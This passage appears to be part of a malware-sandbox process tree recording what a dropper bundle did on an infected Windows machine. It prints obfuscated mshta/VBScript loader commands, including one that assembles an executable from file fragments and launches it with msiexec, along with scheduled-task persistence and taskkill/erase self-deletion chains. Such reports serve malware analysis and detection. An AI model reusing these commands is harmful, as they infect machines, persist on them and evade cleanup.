C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e20⤵PID:9116
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e21⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e22⤵PID:4392
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e23⤵PID:8220
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e24⤵PID:8524
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e25⤵PID:8900
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e26⤵
- Executes dropped EXE
PID:4680 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e27⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e28⤵PID:7236
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e29⤵PID:7732
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e30⤵PID:6232
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e31⤵PID:9576
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e32⤵PID:10056
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e33⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e34⤵PID:9960
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e35⤵PID:10168
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e36⤵PID:8524
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e37⤵PID:10188
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e38⤵
- Checks whether UAC is enabled
PID:10056
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.19⤵
- Runs ping.exe
PID:3560
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WpFILx0yw_EK8MsdJAiKhmLH.exe"C:\Users\Admin\Pictures\Adobe Films\WpFILx0yw_EK8MsdJAiKhmLH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1048
-
-
C:\Users\Admin\Pictures\Adobe Films\a4hC89JjzvN7O07q6G1UDT5s.exe"C:\Users\Admin\Pictures\Adobe Films\a4hC89JjzvN7O07q6G1UDT5s.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:6548 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵PID:3160
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:7124
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"6⤵PID:5748
-
C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"7⤵PID:5756
-
C:\Users\Admin\Pictures\Adobe Films\w9f17aiZVejBtcEeY2Ur_rNz.exe"C:\Users\Admin\Pictures\Adobe Films\w9f17aiZVejBtcEeY2Ur_rNz.exe"8⤵PID:4548
-
-
C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe"C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe"8⤵PID:5876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pigw4o1F_L8sTypvXVcqtG_B.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe" & exit9⤵PID:8664
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pigw4o1F_L8sTypvXVcqtG_B.exe" /f10⤵
- Kills process with taskkill
PID:7156
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\60A6aqKHTLVp0Tkaq2_va_4E.exe"C:\Users\Admin\Pictures\Adobe Films\60A6aqKHTLVp0Tkaq2_va_4E.exe"8⤵PID:6072
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:7704
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:8576
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lnVxn988besVrZFIvNw5A_yc.exe"C:\Users\Admin\Pictures\Adobe Films\lnVxn988besVrZFIvNw5A_yc.exe"8⤵PID:3900
-
-
C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"8⤵
- Checks whether UAC is enabled
PID:6828 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
- Checks whether UAC is enabled
PID:7312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:8056
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
- Checks whether UAC is enabled
PID:8724 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
- Checks whether UAC is enabled
PID:6540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:5752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:5756
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
- Checks whether UAC is enabled
PID:9068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:8572
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:8688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:8420
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵PID:9756
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "CGDdIXA0PUg531oqccqn7mSz.exe"11⤵
- Kills process with taskkill
PID:9024
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\A_qRk2V7YReO1inhr9jfoyoT.exe"C:\Users\Admin\Pictures\Adobe Films\A_qRk2V7YReO1inhr9jfoyoT.exe"8⤵PID:4604
-
-
C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"8⤵PID:8020
-
C:\Users\Admin\AppData\Local\Temp\is-6CPKU.tmp\JaiWjlrNxwqygP7FOh0EGpEb.tmp"C:\Users\Admin\AppData\Local\Temp\is-6CPKU.tmp\JaiWjlrNxwqygP7FOh0EGpEb.tmp" /SL5="$503CC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"9⤵
- Checks whether UAC is enabled
PID:8092 -
C:\Users\Admin\AppData\Local\Temp\is-B3O6B.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-B3O6B.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
PID:8384 -
C:\Users\Admin\AppData\Local\Temp\20-4ab5d-2b0-57994-b23f301dd3a34\Cezhenipoly.exe"C:\Users\Admin\AppData\Local\Temp\20-4ab5d-2b0-57994-b23f301dd3a34\Cezhenipoly.exe"11⤵
- Checks whether UAC is enabled
PID:9072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exe /eufive & exit12⤵PID:7160
-
C:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exe /eufive13⤵PID:9900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exeC:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exe /qn CAMPAIGN="654"13⤵
- Checks whether UAC is enabled
PID:10008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe & exit12⤵PID:9316
-
C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exeC:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe13⤵PID:10152
-
C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe"C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe" -u14⤵PID:8072
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exe /mixfive & exit12⤵PID:9460
-
C:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exe /mixfive13⤵PID:3804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x01bzai5.sl1\autosubplayer.exe /S & exit12⤵PID:9592
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1pGCk9JuFtSvaX509uJfKOjK.exe"C:\Users\Admin\Pictures\Adobe Films\1pGCk9JuFtSvaX509uJfKOjK.exe"8⤵PID:4244
-
-
C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"8⤵PID:5016
-
C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe" -u9⤵PID:9180
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4204
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tTFv5eumajuqhmuOdEfEaVku.exe"C:\Users\Admin\Pictures\Adobe Films\tTFv5eumajuqhmuOdEfEaVku.exe"6⤵
- Suspicious use of SetThreadContext
PID:4772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:1768
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1764
-
-
C:\Users\Admin\Pictures\Adobe Films\JaBAfvNQWyTQv4y21uCa2GjT.exe"C:\Users\Admin\Pictures\Adobe Films\JaBAfvNQWyTQv4y21uCa2GjT.exe"6⤵PID:5036
-
-
C:\Users\Admin\Pictures\Adobe Films\kr1MTXrrJeOVGwkqvX73FOK7.exe"C:\Users\Admin\Pictures\Adobe Films\kr1MTXrrJeOVGwkqvX73FOK7.exe"6⤵PID:6208
-
-
C:\Users\Admin\Pictures\Adobe Films\E_Nmun5chv0A0riFQzxLehHf.exe"C:\Users\Admin\Pictures\Adobe Films\E_Nmun5chv0A0riFQzxLehHf.exe"6⤵PID:6228
-
-
C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
PID:6004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe" & del C:\ProgramData\*.dll & exit7⤵PID:2468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f8⤵
- Kills process with taskkill
PID:7016
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:8204
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"6⤵
- Suspicious use of SetThreadContext
PID:2288 -
C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4056
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"6⤵PID:2852
-
-
C:\Users\Admin\Pictures\Adobe Films\lRmUa61K9ejJsyIOahAhHjo_.exe"C:\Users\Admin\Pictures\Adobe Films\lRmUa61K9ejJsyIOahAhHjo_.exe"6⤵PID:7040
-
-
C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"6⤵
- Suspicious use of SetThreadContext
PID:4880 -
C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"7⤵PID:6308
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4736
-
-
C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"6⤵PID:7076
-
-
C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"6⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\is-S7VFE.tmp\U_tSRTpe9iuHA7rySgKJYnb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-S7VFE.tmp\U_tSRTpe9iuHA7rySgKJYnb3.tmp" /SL5="$40466,506127,422400,C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"7⤵
- Loads dropped DLL
- Checks whether UAC is enabled
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\is-VBE8F.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-VBE8F.tmp\DYbALA.exe" /S /UID=27108⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6452 -
C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe" /VERYSILENT9⤵
- Checks whether UAC is enabled
PID:7772
-
-
C:\Users\Admin\AppData\Local\Temp\a0-34a9d-71c-da1b4-dc85398404dfc\Jocaezhagiba.exe"C:\Users\Admin\AppData\Local\Temp\a0-34a9d-71c-da1b4-dc85398404dfc\Jocaezhagiba.exe"9⤵
- Checks computer location settings
PID:8584
-
-
C:\Users\Admin\AppData\Local\Temp\4b-61723-008-691af-93ff11a02b320\Culaqaecijy.exe"C:\Users\Admin\AppData\Local\Temp\4b-61723-008-691af-93ff11a02b320\Culaqaecijy.exe"9⤵
- Checks whether UAC is enabled
PID:6408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exe /eufive & exit10⤵PID:4808
-
C:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exe /eufive11⤵PID:8904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:7876
-
C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exeC:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe /qn CAMPAIGN="654"11⤵
- Checks whether UAC is enabled
- Enumerates connected drives
- Modifies system certificate store
PID:8948 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635085627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:9200
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe & exit10⤵
- Blocklisted process makes network request
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exeC:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe11⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe"C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe" -u12⤵PID:7684
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exe /mixfive & exit10⤵PID:7388
-
C:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exe /mixfive11⤵PID:6468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtuo0mdo.yro\autosubplayer.exe /S & exit10⤵PID:7280
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\x9ASqAjzf_Bbkm30Jcu897HP.exe"C:\Users\Admin\Pictures\Adobe Films\x9ASqAjzf_Bbkm30Jcu897HP.exe"6⤵
- Loads dropped DLL
PID:1184 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵PID:8972
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"8⤵
- Checks whether UAC is enabled
PID:7508 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x250,0x254,0x258,0x1b0,0x25c,0x7ffd8f5ddec0,0x7ffd8f5dded0,0x7ffd8f5ddee09⤵PID:8776
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff785dc9e70,0x7ff785dc9e80,0x7ff785dc9e9010⤵PID:9356
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1732,13450803032759380374,11374153478421282962,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7508_508508207" --mojo-platform-channel-handle=1748 /prefetch:89⤵PID:7848
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe4⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Users\Admin\AppData\Roaming\485024.exe"C:\Users\Admin\AppData\Roaming\485024.exe"6⤵
- Executes dropped EXE
PID:2364
-
-
C:\Users\Admin\AppData\Roaming\5661510.exe"C:\Users\Admin\AppData\Roaming\5661510.exe"6⤵
- Executes dropped EXE
PID:4396
-
-
C:\Users\Admin\AppData\Roaming\838218.exe"C:\Users\Admin\AppData\Roaming\838218.exe"6⤵
- Executes dropped EXE
PID:4864
-
-
C:\Users\Admin\AppData\Roaming\4220952.exe"C:\Users\Admin\AppData\Roaming\4220952.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4360 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:5136
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe4⤵PID:2260
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exeWed094c47c32b.exe5⤵
- Executes dropped EXE
PID:1764 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))6⤵
- Checks whether UAC is enabled
PID:3820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"7⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4352 -
